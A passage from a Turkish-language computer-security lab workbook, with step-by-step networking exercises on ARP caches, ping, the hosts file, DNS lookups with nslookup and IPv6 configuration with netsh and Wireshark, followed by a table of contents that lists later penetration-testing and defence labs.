  • İpucu: ifconfig komutu geçerli olan IP adresinin değiştirilmesini bu yöntemle yapar. Makine yeniden başlatıldığında, varsayılan olarak /etc/network/interfaces dosyasındaki yapılandırma ayarına geçecektir. Kalıcı bir değişiklik yapmak için, bir metin düzenleyicisiyle dosyayı değiştirin.

 

Adım 6: ARP tablosunu görüntüleyin.

Kali makinesinde çalışırken ARP tablosunu arp yardımcı programını kullanarak görüntüleyeceksiniz.

  1. Komut satırına arp -h yazın ve ENTER’a basın.
  2. Bu komut için seçenekleri gözlemleyin.
  3. Komut satırına arp -an yazın ve ENTER’a basın.
    1. a ve n seçenekleri ne yapar?
    2. Sizin herhangi bir kaydınız var mı?

 

Adım 7: Metasploitable makineye IP adresi üzerinden ping atarak önbelleği görüntüleyin.

Kali PC’den Metasploitable sunucu makinesi ile iletişim kurmak için ping yardımcı programını kullanacaksınız.

NOT: Bunları yapmadan önce Metasploitable makineye IP adresi, subnet mask ve yönlendirici adresi atamalısınız. Bunun için şu adımları takip edin:

  • Metasploitable makinede oturum açmak için login isteminde msfadmin yazın ve ENTER’a basın.
  • Password isteminde msfadmin yazın ve ENTER’a basın. (siz tuşlara basarken hiçbir harf görünmeyecektir. Sorun değil yazmaya devam edin.)
  • Komut isteminde sudo su yazarak root olun.
  • ifconfig eth0 192.168.2.42 subnetmask 255.255.255.0 up yazın ve ENTER’a basın. (ayarladığınız IP adresinin ana makinenizle aynı ağda olmasına dikkat edin)
  • Yönlendirici adresini atamak için route add default gw 192.168.2.159 yazın ve ENTER’a basın. (yönlendirici adresinizin ana makinenizin IP adresi olmasına dikkat edin)
  1. Komut satırına ping 192.168.100.202 yazın ve ENTER’a basın.
  2. Ping yanıtlarının, onları durdurana kadar devam edeceğine dikkat edin. Şekil 1-5’te gösterildiği gibi yanıtları durdurmak için CTRL-C tuşlarına basın.
  3. Görüntülenen bilgileri gözlemleyin.
  4. icmp_req nedir?
  5. Yanıtların geri kalanıyla karşılaştırıldığında ilk yanıtın aldığı zamana dikkat edin. Önemli bir fark var mıydı? Öyleyse neden?
  6. Bu yanıtın aslında doğru bilgisayardan geldiğinden nasıl emin olabilirsiniz?
  7. Komut satırına arp -an yazın ve ENTER tuşuna basın.
  8. Kaydı gözlemleyin. Metasploitable makinenin MAC adresinin listelendiğine dikkat edin.

1.PNGŞekil 1-5 Linux’te ping komutu

Adım 8: ARP önbelleğini değiştirin ve tekrar ARP önbelleğini görüntüleyin.

  1. Komut satırına arp -d 192.168.2.42 yazın ve ENTER tuşuna basın
  2. Kayıtları gözlemleyin. (Eğer bir kayıt görmüyorsanız, endişelenmeyin; ARP önbelleğindeki işlemleri silmeyi basitleştiriyoruz.)
  3. Şekil 1-6’da gösterildiği gibi komut satırına arp -an yazın ve ENTER tuşuna basın.
  4. ARP önbelleğinin artık hiçbir MAC adresine sahip olmadığını gözlemleyin.
  5. Komut satırına, ping 192.168.2.42 yazın ve ENTER’a basın. Yanıtları durdurmak için CTRL-C’yi kullanın.
  6. Komut satırına arp -an yazın ve ENTER tuşuna basın.
  7. Kaydı gözlemleyin. MAC adresinin bir kez daha listelendiğine dikkat edin.
  8. Ping komutu kullanılarak makinenin MAC adresinin ARP önbelleğinde listelenmesi nasıl sağlanır? (Bu, bir sonraki bölümdeki Lab 2.1, Ağ İletişimi Analizi’nde incelenmiştir.)
  9. Bunun aslında bilgisayarın doğru MAC adresi olduğundan nasıl emin olabilirsiniz?

1.PNGŞEKİL 1-6 Linux’te arp komutu

Adım 9: Kali PC’den çıkış yapın.

  1. Sağ üst köşede root’a ve Kapat’a tıklayın.
  2. Sistemi Kapat? iletişim kutusunda, Kapat’a tıklayın.
  • Not: ARP protokolü ve uygulaması basit bir güvenme özelliğine dayanır. Bu, uygulamada yardımcı olur, ancak sorunlu bir zayıflık katar: ARP istemese de her şeye tamamen güvenir ve inanır.

 

Laboratuvar 1.1 Analiz Soruları

Aşağıdaki soruları cevaplayınız.

  1. Yerel alan ağına bağlanamayan bir müşterinin bilgisayarında sorun gidermek için çağrıldınız. Yapılandırmayı kontrol etmek için hangi komutu kullanırsınız? Hangi bilgileri ararsınız?
  2. Yerel alan ağına bağlanabilen, ancak başka bir ağa bağlanamayan bir müşterinin bilgisayarında sorun gidermek için çağrıldınız. Yapılandırmayı kontrol etmek için hangi komutu kullanırsınız? Hangi bilgileri arasınız?
  3. Bir kullanıcının MAC adresini ve ağ yapılandırma bilgilerini edinmeniz gerekiyorsa hangi komut ve anahtarı girersiniz?
  4. DNS ve yönlendirici bilgileri de dahil olmak üzere IP ayarlarını yapmak için Windows GUI yardımcı programını kullanarak hangi adımları atarsınız?
  5. Uzak bir bilgisayara (remote computer) ping atmanız gerek. Uzak bilgisayarın MAC adresini yerel olarak almak MAC adresini nasıl elde edersiniz?
  6. Bazı ağ trafiği analizi testleri yapmak üzeresiniz. ARP ön belleğinizi temizlemeniz gerekiyor. Bu görevi nasıl yerine getirirsiniz? (Windows ve Linux için)
  7. Hangi bilgiler kullanıcıya ping dönüşü yapar?
  8. Bir bilgisayar, bir ARP yayınından aldığı yanıtların doğru olduğundan nasıl emin olur?

 

Lab 1.1 Anahtar Terimler Sınavı

Aşağıdaki cümleleri tamamlamak için laboratuvarlarda öğrendiğiniz terimleri kullanın:

  • Adres Çözümleme Protokolü (ARP)
  • ARP önbelleği
  • Alan Adı Sistemi (DNS)
  • Dinamik Ana Bilgisayar Yapılandırma Protokolü (DHCP)
  • Yönlendirici
  • Host adresi
  • ifconfig
  • Internet Denetim İletisi Protokolü (ICMP)
  • Internet Protokolü (IP)
  • ipconfig
  • Ortam Erişimi Denetimi (MAC) adresi
  • Ağ adresi
  • ping
  • conf
  • Alt ağ maskesi
  • Yaşama Zamanı (TTL)
  • İletim Kontrol Protokolü/Internet Protokolü (TCP/IP)

 

  1. IP harfleri __________________anlamına gelmektedir.
  2. _____________, kartı oluşturan şirket tarafından atanan ağ arabirim kartınızın fiziksel adresidir.
  3. ipconfig /renew, _______________ sunucusundan alınan bir IP adresini yeniler.
  4. Bir makineyi internete bağlamak için gereken dört öğe _______________ adresi, __________________ adresi, ___________________ ve _______________ adresidir.
  5. ____________________, host adresini ve ağ adresini bir IP adresinden ayırmak için kullanılır.
  6. ____________________, Linux’te DNS sunucusu adreslerini içeren dosyadır.
  7. _______________ komutu, Linux’te metin dosyalarının içeriğini görüntülemek için kullanılır.
  8. ___________________, Linux’te ağ bağlantısını sınamak için kullanılan komuttur.

 

Lab 1.2: Bilgisayar Adı Çözümlemesi

IP adreslerini akılda tutmak birçok ağda çok sayıda makine olduğundan zor olabilir. Bu karmaşıklığı çözmemizin bir yolu, Alan Adı Sistemi’nin (Domain Name System-DNS) kullanılmasıdır. DNS, bilgisayarın IP adresini uygun alan adına çevirir.

DNS, host (ana bilgisayar) dosyası adı verilen yerel bir dosyadır. Host dosyası, IPv4 adreslerine karşılık gelen host adlarının listelendiği bir dosyadır. Varsayılan olarak sadece bir tane IP adresi vardır (localhost adresi). Bu da loopback adresine (127.0.0.1) eşdeğerdir.

Eğer host dosyasında hiç IP adresi bulunmazsa bilgisayar, IP adresleri için DNS önbelleğini (cache) ve sonra da DNS sunucusunu sorgular. DNS cache, yakınlarda kullanılan iki parçadan oluşan IP adreslerinin yerel bir kopyasını tutar. Eğer önbellekte hiç ad yoksa doğrudan bir DNS sunucusuna istek gönderilir. Eğer DNS sunucusu veri tabanında hiç IP adresi bulunmazsa, DNS sunucusu, bu bilgi için diğer DNS sunucularına sorabilir. DNS sunucuları adlandırma yetkilileri tarafından belirli bir hiyerarşik yapıda düzenlenmektedir. Kullanımı sona eren sunucular en sonda yer alır. Bu, IP adreslerinin adlarının çözümlenmesi için uygun bir yöntemdir.

Tam Yetkili Alan Adı (Fully Qualified Domain Name-FQDN), ağdaki bir hostun belirlenmesi için kullanılan nokta ile ayrılmış bir isimdir. FQDN, host adının yanısıra, onun alan adı ve başka bir alt alan adından meydana gelir. www.somename.com gibi.

Bu laboratuvarda, host dosyasını kullanacak, FQDN kullanarak bağlantıyı test edecek ve nslookup komutunun işlevselliğini keşfedeceksiniz.

 

Öğrenim Amaçları

Bu laboratuvarı tamamladıktan sonra

  • Loopback adreslerinin ağ kartını test etmek için nasıl kullanılabileceğini anlayabilirsiniz.
  • Temel bir metin editörü kullanarak host dosyasını düzenleyebilirsiniz.
  • DNS önbelleğini komut satırından kontrol edebilirsiniz.
  • Komut satırından FQDN’i IP adresine, IP adresini FQDN’e çözümleyebilirsiniz.
  • Windows ortamında IP adreslerinin içinden adların nasıl çözümlendiğini anlayabilirsiniz.

 

Lab 1.2w: Windows’ta Ad Çözümlemesi

Malzemeler ve Kurulum

Aşağıdakilere ihtiyacınız olacaktır:

  • Windows 10
  • Windows 2016 Server
  • Metasploitable (DNS sunucusu olarak davranır)

 

Laboratuvar Adımlarına Kısa Bir Bakış

Adım 1: Windows 10 PC’yi, Windows 2016 Server’ı ve Metasploitable PC’yi başlatın. Yalnızca Windows 10 makineye giriş yapın.

Adım 2: Windows 10 bilgisayardan Windows 10 bilgisayara ping atın.

Adım 3: Host dosyasını görüntüleyin ve değişiklik yapın.

Adım 4: FQDN kullanarak Windows 2016 Server PC’ye ping atın.

Adım 5: nslookup komutu kullanarak IP adresi bilgisini görüntüleyin.

Adım 6: Windows 10 PC’den çıkış yapın.

 

Laboratuvar Adımları

Adım 1: Windows 10 PC’yi, Windows 2016 Server’ı ve Metasploitable PC’yi başlatın. Yalnızca Windows 10 makineye giriş yapın.

Windows 10 PC’de oturum açmak için aşağıdaki adımları izleyin:

  1. Oturum açma ekranında Yönetici simgesini tıklayın.
  2. Parola metin kutusuna adminpass yazın ve ENTER tuşuna basın.

 

Adım 2: Windows 10 bilgisayardan Windows 10 bilgisayara ping atın.

Windows 10 PC’yi kullanarak, üzerinde çalıştığınız bilgisayara hem loopback (geri dönüş) adresini (127.0.0.1) hem de “localhost” adını kullanarak ping atacaksınız. Bu genellikle ağ arayüz kartının (NIC) ve TCP/IP’nin diğer sorun giderme yöntemlerine geçmeden önce çalışıp çalışmadığını sınamak içindir.

  1. Loopback adresini kullanarak makineye ping atmak için Windows logo tuşu | Çalıştır‘ı seçin ve cmd yazıp ENTER’a basın.
  2. Komut satırında ping 127.0.0.1 yazın. ENTER’a basın.
  3. Görüntülenen bilgileri gözlemleyin.
  4. Windows 10 bilgisayara localhost kullanarak ping atmak için, komut satırına ping localhost yazın.
  5. Görüntülenen bilgileri gözlemleyin.
    1. Bilgisayar localhost adresinin 127.0.0.1 varsayılanı olduğunu nasıl biliyor?

 

Adım 3: Host dosyasını görüntüleyin ve değişiklik yapın.

Şimdi host dosyasını görüntüleyecek ve değiştireceksiniz. Host dosyası bir ağdaki host (bilgisayar) adlarını ve IP adreslerini listeleyen bir metin dosyasıdır. Küçük bir ağda host dosyası DNS’e alternatif olarak kullanılabilir.

Host dosyasını görüntülemek ve değiştirmek için aşağıdaki adımları izleyin.

  1. Windows logo tuşu | Programlar | Aksesuarlar ve Notepad’i sağ tıklayıp Yönetici Olarak Çalıştır’ı seçin.
  2. Kullanıcı Hesabı Denetimi iletişim kutusunda Evet’i tıklayın.
  3. Dosya | Aç’a tıklayın. Uzantı tipini Tüm Dosyalar için ayarlayın. Ardından C:\windows\system32\drivers\etc\ dizinine gidin ve host dosyasını seçin.
    1. Görüntülenen bilgileri gözlemleyin.
    2. Hangi bilgiler orada zaten mevcut?
    3. Yorumlarınız neler?
  4. Host dosyasının sonuna aşağıdaki satırları ekleyin. (Şekil 1-7’de gösterildiği gibi):

192.168.2.169 2k16serv      (Windows 2016 Server IP)

192.168.2.159 me               (Ana bilgisayar IP)

  1. Dosya | Kaydet’i seçin. Notepad’i kapatın.

Yeni adlara ping atmak için aşağıdakileri uygulayın.

  1. Komut satırında ping me yazın. Hangi IP adresi geliyor?
  2. Komut satırında ping 2k16serv yazın.
  3. Hangi IP adresi geliyor?
  4. Neden host dosyasını değiştirmek için yönetici haklarının gerektiğini düşünüyorsunuz?
  5. Bu dosyanın sömürülebileceği bir yol düşünebiliyor musunuz?

x.pngŞekil 1-7 Notepad ile host dosyasını değiştirme

Adım 4: FQDN kullanarak Windows 2016 Server PC’ye ping atın.

Windows 10 PC’den Windows 2016 Server makinesi ile iletişim kurmak için ping yardımcı programını kullanacaksınız. DNS önbelleğine bakacak ve bu işlem sırasında nasıl değiştiğini gözlemleyeceksiniz.

  1. Windows 2016 Server makinesinin IP adresine ping atmak için komut satırına ping 168.2.102 komutunu yazın.
  2. Bilgileri gözlemleyin.
  3. DNS önbelleğinin içeriğini kontrol etmek için, ipconfig /displaydns yazın.
  4. Listede ne görüyorsunuz?
  5. security.local bir tane var mı?
  6. Windows 2016 Server bilgisayarına ada göre ping atmak için komut satırında ping win2k16serv.security.local yazın.
  7. Bilgileri gözlemleyin.
  8. Bu komut sunucunun IP adresini gösterdi mi?
  9. Tekrar DNS önbelleğinin içeriğini kontrol etmek için ipconfig /displaydns yazın.
  10. Bu sefer win2k16serv.security.local girdisi var mı?
  11. DNS önbelleği nereden geldi?

Adım 5: nslookup komutu kullanarak IP adresi bilgisini görüntüleyin.

Ad çözümlemesini görüntülemek için nslookup komutunu kullanacaksınız. nslookup komutu, FQDN’den bilgisayarın IP adresini keşfetmenize veya IP adresini kullanarak FQDN’i belirlemenize olanak tanır.

Nslookup komutunun mevcut seçeneklerini listelemek için şu adımları izleyin:

  1. Komut satırında nslookup yazın.
  2. Komut satırında help yazın.
  • NOT: Windows komut satırında bulunan birçok komutun aksine komutun sonuna eklenen /? bu ek nslookup için kullanım bilgilerini sağlamayacaktır.
  1. Görüntülenen bilgileri gözlemleyin.
  2. Geçerli sunucu/host seçeneklerinden hangisi görüntülenir?
  3. Komut satırında exit yazın.
  4. Windows 10 bilgisayarın IP adresini kontrol etmek için komut satırında şu komutu yazın: nslookup win10.security.local

IP adresi hatasız mı?

  1. Windows 2016 Server bilgisayarın IP adresini kontrol etmek için Şekil 1-8 ‘de gösterildiği gibi komut satırında şu komutu yazın: nslookup Win2k16serv.security.local
  2. IP adresi hatasız mı?
  3. Sunucunun isminin win2k16serv olduğunu ve 2k16serv’ün host dosyasına koyduğunuz isim olduğunu unutmayın.

1.PNG                              Şekil 1-8 nslookup komutu

  • NOT: nslookup komutu bir bilgisayarın tam yetkili alan adını kullanır.

 

Adım 6: Windows 10 PC’den çıkış yapın.

Windows logo tuşu | Bilgisayarı Kapat | Kapat’a tıklayın.

 

  • NOT: Her ne kadar kolay bir bakış olmasına rağmen, paketin kaynak IP adresi değiştirilebilir (spoofed). Bu yüzden kaynağın asıl IP adresiymiş gibi körü körüne inanılmamalı. Bu, IPv4’ün bir zayıflığıdır ve IP Security (IPsec) kullanımı, Internet Protokolü’nün isteğe bağlı bir bileşenidir.

 

Laboratuvar 1.2 Analiz Soruları

  1. Büyük bir ağın yöneticisisiniz. Kullanıcıların web tarayıcılarına kelime yazarak bir web sitesine erişimine izin veren değişiklik yapmak istiyorsunuz. Örneğin, kullanıcının seninsiten.com yerine seninsiten yazarak bu siteye erişmesi gibi. Daha önce yaptığınız laboratuvara göre, verilen örnek için bu nasıl başarılır?

 

  1. Bir Windows makinede alan adlarının çözümlenme sırası nasıldır?

 

  1. nslooup <IP address> komutunun girilmesi size hangi bilgileri verecektir?

 

Laboratuvar 1.2 Anahtar Terimler Sınavı

127.0.0.1

DNS önbelleği

Alan Adı Sistemi (DNS)

Tam Yetkili Alan Adı (FQDN)

Host dosyası

IP adresleri

Localhost adresi

Loopback adresi

nslookup

ping localhost

 

  1. _____________________ komutu, DNS sorgusu ve sınaması için kullanılan komuttur.
  2. ______________________komutu, ağ kartının ve TCP/IP’nin yerel bir makinede çalışıp çalışmadığını test eden komuttur.
  3. FQDN harfleri __________ ___________  __________ __________ anlamına gelir.
  4. nslookup seninsiten.com komutu FQDN ile ilişkili tüm ____________ ni sunacaktır.
  5. ______________________, bir zaman periyodu için çözümlenen adların tutulduğu hafızada küçük bir alandır.
  6. Hangi dosya IP adresleri için bilgisayar adlarını haritalar?

______________________.

 

Lab 1.3: IPv6 Temelleri

Genellikle TCP veya IP olarak adlandırılan TCP/IP ağı, kullanılan protokolün sürümünü belirtir. Yakın zamana kadar, bunun nedeni herkesin aynı sürümü versiyon 4’ü kullanmasıydı. IPv4’ün eksiklerinden biri adres alanının büyüklüğüdür. Bu erken fark edildi ve 1990’ların sonunda yedek protokol olan IPv6 geliştirildi. IPv6’nın benimsenmesi yavaştı çünkü yakın zamana kadar kullanım için envanterde IPv4 adresleri kalmıştı. IPv4 adres stoklarının yaklaşan sonu hem IPv4 hem de IPv6’nın kullanıldığı işletmelerin taşınmasına neden olmuştur.

IPv4 ile IPv6 protokolleri geriye dönük olarak uyumlu değildir. Benzer olan ancak IPv4 kullanımı sırasında keşfedilen sorunları çözmek için değişmiş birçok yönü vardır. Önemli bir özellik IPv6 standardıyla ilişkili otomatik yapılandırma özelliklerinden biridir. IPv6, IPv4’ün 30 yılında keşfedilen sorunları ele alarak Internet Protokolü’nün erişimini genişletmek için tasarlanmıştır. IP adresi alanı en gözle görülür değişikliktir ancak IP özellikli aygıtların DHCP kullanmadan, güvenlik işlevselliğinin dağıtımı ve hizmet kalitesinin daha kolay yapılandırılması gibi sorunlar da IPv6’ya isteğe bağlı uzantılar olarak (sınırlamalarla) tasarlandı.

ICMPv6’da kayda değer değişikliler ortaya çıkmıştır: ICMP mesajları yönlendirme ile ilgili paket kaybı sorunlarını kontrol etmek için kullanılır. Dolayısıyla, ağda ICMPv6’nın engellenmesi sistemin iletim hatası mesajları almamasına neden olur. ICMP ayrıca IP özellikli cihazların otomatik yapılandırılmasını sağlamak için Komşu Bulma (Neighbor Discovery-ND) ve Komşu Talebi (Neighbor Solicitation-NS) mesajlarını iletmek için kullanılır. ICMP, versiyon 6 ile ayarlanan protokolün tam bir parçası haline gelmiştir.

IPv6, Tablo 1-1’de listelendiği gibi çeşitli adres türlerini desteklemektedir.

t.pngTablo 1-1 IPv6 Adres Türleri

Link-local unicast (yerel bağlantılı tek noktaya yayın) adresleri, 169.254.0.0/16 IPv4 adres dizisine benzer. Bu adresler otomatik olarak bir arayüze atanır, adreslerin ve Neighbor Discovery’nin otomatik yapılandırılması için kullanılır. Bu adresler yönlendirilmemelidir.  Multicast (çoklu yayın) adresleri, IPv4’teki boadcast işlevini yerine getiren adreslerdir. Multicast adresler bağlantıdan siteye kadar çeşitli kapsamlarda tanımlanabilir. Global unicast adresler, belirli bir tek IP adresi ile, multicast adres, bir grup IP adresi ile, anycast adresler ise IPv6 adres gruplarının herhangi bir üyesiyle iletişim kurmak için kullanılır.

Öğrenim Amaçları

Bu laboratuvarı tamamladıktan sonra

  • Yeni IPv6 başlıklarını (header) anlayacaksınız.
  • Farklı adres biçimlerini anlayacaksınız.
  • IPv6 adresleme terimlerini anlayacaksınız.
  • IPv4 ile IPv6 trafikleri arasındaki farklılıkları tanıyacaksınız.

 

  • 40 DAKİKA

 

Lab 1.3w: Windows’ta IPv6 Temelleri (netsh/ping6)

Malzemeler ve Kurulum

Aşağıdakilere ihtiyacınız olacaktır:

  • Windows 10
  • Windows 2016 Server

Laboratuvar Adımlarına Kısa Bir Bakış

Adım 1: Windows 10 PC’yi ve Windows 2016 Server’ı başlatın. Yalnızca Windows 10 makineye giriş yapın.

Adım 2: IPv6 ayarlarını doğrulayın.

Adım 3: Windows 2016 Server PC’ye giriş yapın.

Adım 4: IPv6 ayarlarını doğrulayın.

Adım 5: Windows 10 PC’de Wireshark’a giriş yapın.

Adım 6: Windows 10 bilgisayardan Windows 2016 Server bilgisayara ping atın.

Adım 7: Windows 10 bilgisayarda IPv6 adresini değiştirin.

Adım 8: Windows 2016 Server bilgisayarda IPv6 adresini değiştirin.

Adım 9: Wireshark’ta IPv6 ping trafiğini gözlemleyin.

Adım 10: Çeşitli IP adresleri arasındaki haberleşmeyi inceleyin.

Adım 11: Tüm IPv6 biçim durumlarına reset atın.

Adım 12: Windows 10 ve Windows 2016 Server PC’lerden çıkış yapın.

 

Laboratuvar Adımları

Adım 1: Windows 10 PC’yi ve Windows 2016 Server’ı başlatın. Yalnızca Windows 10 makineye giriş yapın.

Windows 10 PC’de oturum açmak için aşağıdaki adımları izleyin:

  1. Oturum açma ekranında Yönetici simgesini tıklayın.
  2. Parola metin kutusuna adminpass yazın ve ENTER tuşuna basın.

 

Adım 2: IPv6 ayarlarını doğrulayın.

  1. Komut istemini açın.
  2. Komut satırında netsh interface ipv6 show address yazın. Şekil 1-9’da gösterilene benzer bir yanıt almalısınız.
  3. IPv6 adresinizi daha sonra kullanmak üzere kaydedin.

1.PNGŞekil 1-9 IPv6 Ayarları

 Adım 3: Windows 2016 Server PC’ye giriş yapın.

Windows 2016 Server PC’de oturum açmak için şu adımları izleyin:

  1. Oturum Aç ekranında, CTRL-ALT-DEL tuşlarına basın. (sanal makinada giriş ekranına ulaşmak için, pencerenin sağ alt köşesindeki Right Control alanına sağ tıklayarak CTRL-ALT-DEL Ekle seçeneğine tıklayın.)
  2. Kullanıcı adını administrator ve parolayı adminpass olarak girin. (Kurulum yaparken bu bilgisayar için parola adminpass olarak belirlenmiştir.)
  3. Tamam’ı tıklayın.

 

Adım 4: IPv6 ayarlarını doğrulayın.

  1. Komut istemini açın.
  2. Komut satırında netsh interface ipv6 show address yazın.
  3. IPv6 adresinizi daha sonra kullanmak üzere kaydedin.

 

Adım 5: Windows 10 PC’de Wireshark’a giriş yapın.

  • NOT: Wireshark, bir protokol analizcisi ve ağ koklama (sniffing) programıdır. Bölüm 2’de derinlemesine ele alınacaktır.

Windows makinede şu adımları izleyin:

  1. Windows logo tuşu | Tüm Programlar | Wireshark’ı seçin.
  2. Wireshark içinde Capture | Options’ı seçin.
  3. Uygun arayüz için Start’a tıklayın. (örneğin wi-fi ile bağlı olduğum için önce wi-fi’a tıklayarak Start butonuna basın)
  • NOT: Uygun arayüz, önceki adımda kaydettiğiniz ilgili IP adresine sahiptir.

 

Adım 6: Windows 10 bilgisayardan Windows 2016 Server bilgisayara ping atın.

Windows 10 makinede komut penceresine şu komutu yazıp ENTER’a basın: ping -6 [yanına Windows 2016 Server makinenin IP adresi yazılacak]

IPv6 adresi, fe80::146d:ad97:8a6c:d829 gibi bir şeye benzeyecektir. Şekil 1-10’da gösterilene benzer bir cevap almalısınız.

1.PNGŞekil 1-10 ping -6 komutu

Adım 7: Windows 10 makinesinin IPv6 adresini değiştirin.

  1. Windows makinede, geçerli Komut İstemi penceresini kapatın.
  2. Windows logo tuşu | Programlar | Aksesuarlar’ı seçin ve Komut İstemi’ne sağ tıklayın.
  3. Yönetici Olarak Çalıştır’a tıklayın.
  4. Evet’i tıklayın.
  5. Komut satırında netsh interface ipv6 set address “sizin arayüz adınızı yazınız” 2001:db8:1234:5678::3
  6. netsh interface ipv6 show address yazarak adresi doğrulayın.
  7. Daha sonra kullanmak üzere IPv6 adresini ve türlerini kaydedin.
  • NOT: Arayüz adının bir örneği için Şekil 1-11’e bakabilirsiniz.

 

1.PNG

Şekil 1-11 IPv6 adresini gösterme ve değiştirme

Adım 8: Windows 2016 Server bilgisayarda IPv6 adresini değiştirin.

  1. Windows logo tuşu | Programlar | Aksesuarlar’ı seçin ve Komut İstemi’ne sağ tıklayın.
  2. Yönetici Olarak Çalıştır’a tıklayın.
  3. Evet’i tıklayın.
  4. Komut satırında netsh interface ipv6 set address “sizin arayüz adınızı yazınız” 2001:db8:1234:5678::2  (ethernet olmalı)
  5. netsh interface ipv6 show address komutunu yazarak adresi doğrulayın.
  6. Daha sonra kullanmak üzere IPv6 adresini ve türlerini kaydedin.

 

 

Adım 9: Wireshark’ta IPv6 ping trafiğini gözlemleyin.

Windows 10 PC’de Wireshark çıkışını görüntüleyerek IPv6 ping’ini doğrulayın. Şekil 1-12’de gösterilene benzer bir cevap almalısınız.

1.PNG

Şekil 1-12 Wireshark’ta IPv6 trafiği

  • NOT: Filter alanında IPv6’yı belirleyerek ve Apply’i tıklayarak sonuçları yalnızca IPv6 ile ilgili trafiği gösterecek şekilde filtreleyebilirsiniz.

 

Adım 10: Çeşitli IP adresleri arasındaki haberleşmeyi inceleyin.

Bu adım için, Windows 10’da Wireshark ve ping -6 komutunu ve Windows 2016 Server’da Wireshark ve ping komutunu kullanarak denemeler yapın. Çeşitli IPv6 adresleri arasında iletişim kurmayı inceleyin.

Farklılıklar neler?

 

Adım 11: Tüm IPv6 biçim durumlarına reset atın.

Her iki makine için de komut istemi penceresinde netsh interface ipv6 reset yazın ve ENTER tuşuna basın.

 

Adım 12: Windows 10 ve Windows 2016 Server PC’lerden çıkış yapın.

  1. Windows 10 için, Windows logo tuşu| Bilgisayarı Kapat | Kapat’ı seçin.
  2. Windows 2016 Server için, Windows logo tuşu | Kapat | Tamam’ı tıklayın.

 

Laboratuvar 1.3 Analiz Soruları

  1. Wireshark’ta yakalanan farklı tipteki IPv6 trafiği türleri nelerdir?

 

  1. Wireshark’ı kullanarak, bu laboratuvarda gözlemlenen IPv4 ve IPv6 paketleri arasındaki farkları açıklayınız.

 

Laboratuvar 1.2 Anahtar Terimler Sınavı

anycast adres

global unicast adres

ICMPv6

link-local unicast adres

multicast adresler

Neighbor Discovery (ND)

Neighbor Solicitation (NS)

  1. __________________ Neighbor Discovery (ND) için kullanılan protokoldür.
  2. IPv6 adresleri FE80 ile başlayan _________________ i temsil eder.
  3. IPv6’da yayın mesajları ________________ kullanılarak iletilir.

 

 

Bilgisayar Güvenliği Esasları – Giriş ve Bilgilendirme

İÇİNDEKİLER

PART I     AĞ TEMELLERİ: AĞLAR NASIL ÇALIŞIR?

Bölüm 1  Workstation Ağ Yapılandırması Ve Bağlantısı

Lab 1.1 Ağ Workstation İstemci Yapılandırması

Lab 1.1w Windows İstemci Yapılandırması

Lab 1.1l Linux İstemci Yapılandırması

Lab 1.2 Bilgisayar Adı Çözümlemesi

Lab 1.2w Windows’ta Ad Çözümlemesi

Lab 1.3 IPv6 Temelleri

Lab 1.3w Windows’ta IPv6 Temelleri (netsh/ping6)

Bölüm 2  Ağ Taşımaları

Lab 2.1 Ağ İletişim Analizi

Lab 2.1w Windows’ta Ağ İletişim Analizi

Lab 2.2 Port Bağlantı Durumu

Lab 2.2w Windows-Tabanlı Port Bağlantı Durumu

Lab 2.2l Linux-Tabanlı Port Bağlantı Durumu

Bölüm 3  Ağ Uygulamaları

Lab 3.1 FTP İletişimi (FTP-HTTP)

Lab 3.1w Windows FTP İletişimi (FTP-HTTP)

Lab 3.1l Linux FTP İletişimi (FTP-HTTP)

Lab 3.2 E-posta Protokolleri: SMTP ve POP3

Lab 3.2w Windows E-posta: SMTP ve POP3

Lab 3.2l Linux E-posta: SMTP ve POP3

 

PART II    AÇIKLAR VE TEHDİTLER: SİSTEMLERE NASIL SIZILABİLİR?

Bölüm 4  Penetrasyon (Sızma) Testi

Lab 4.1 IP Adres ve Port Taraması, Servis Kimliği Belirlenmesi

Lab 4.1w Windows’ta Nmap Kullanımı

Lab 4.2 GUI Tabanlı Güvenlik Açığı Tarayıcıları

Lab 4.2m Güvenlik Açığı Tarayıcı Kullanımı (OpenVAS)

Lab 4.3 Sistem Güvenlik Açıklarının Araştırılması

Lab 4.3i Sistem Güvenlik Açıklarının Araştırılması

Lab 4.4 Metasploit Kullanımı

Lab 4.4l Metasploit Framework’ün Kullanımı

Lab 4.5 Parola Kırılması

Lab 4.5l Parola Kırılması

Lab 4.6 Cobalt Strike’ın Kullanımı

Lab 4.6l Cobalt Strike’ın Kullanılması

Bölüm 5  Uygulama Saldırıları

Lab 5.1 SQL Web Enjeksiyonu

Lab 5.1li Linux’te SQL Web Enjeksiyonu

Lab 5.2 Web Tarayıcısı İstismarları

Lab 5.2m Web Tarayıcısı İstismarları

Lab 5.3 E-posta Sistemi İstismarları

Lab 5.3m Windows’ta E-posta Açıklarının İstismar Edilmesi

Bölüm 6  Daha Fazla Atak: Trojan Atakları, MITM,

Steganografi

Lab 6.1 Trojan Atakları

Lab 6.1w Dark Comet Trojan’inin Kullanımı

Lab 6.2 Man-in-the-Middle Atağı

Lab 6.2m Man-in-the-Middle Atağı

Lab 6.3 Steganografi

Lab 6.3w Windows’ta Steganografi

PART III   ÖNLEME: AĞLARA ZARAR VERİLMESİ NASIL ÖNLENEBİLİR?

Bölüm 7  Ana Bilgisayara Zarar Verme

Lab 7.1 İşletim Sisteminin Güçlendirilmesi (Sertleştirilmesi)

Lab 7.1w Windows 7’nin Güçlendirilmesi

Lab 7.2 Antivirüs Uygulamalarının Kullanımı

Lab 7.2w Windows’ta Antivirüs Kullanımı

Lab 7.3 Güvenlik Duvarı Kullanımı

Lab 7.3l Linux’te Kişisel Güvenlik Duvarı

 

Bölüm 8  Ağ İletişimi Güvenliği

Lab 8.1 E-posta Şifrelemesi Ve İmzalaması İçin GPG Kullanımı

Lab 8.1m Windows’ta GPG Kullanımı

Lab 8.2 Güvenli Kabuk (Secure Shell – SSH) Kullanma

Lab 8.2l Linux’te SSH Kullanımı

Lab 8.2w Windows’ta SSH Kullanımı

Lab 8.3 Güvenli Kopyalama (Secure Copy – SCP) Kullanma

Lab 8.3l Linux’te SCP Kullanımı

Lab 8.3w Windows’ta SCP Kullanımı

Lab 8.4 Sertifika ve SSL Kullanma

Lab 8.4l Linux’te Sertifika Ve SSL Kullanımı

Lab 8.5 IPsec Kullanma

Lab 8.5w Windows’ta IPsec Kullanımı

PART IV   TESPİT VE CEVAP: ATAKLAR NASIL TESPİT EDİLİR VE ONLARA YANIT NE OLUR?

Bölüm 9  Saldırıların Hazırlanması Ve Tespit Edilmesi

Lab 9.1 Sistem Log (Günlük) Analizi

Lab 9.1w Windows’ta Log Analizi

Lab 9.1l Linux’te Log Analizi

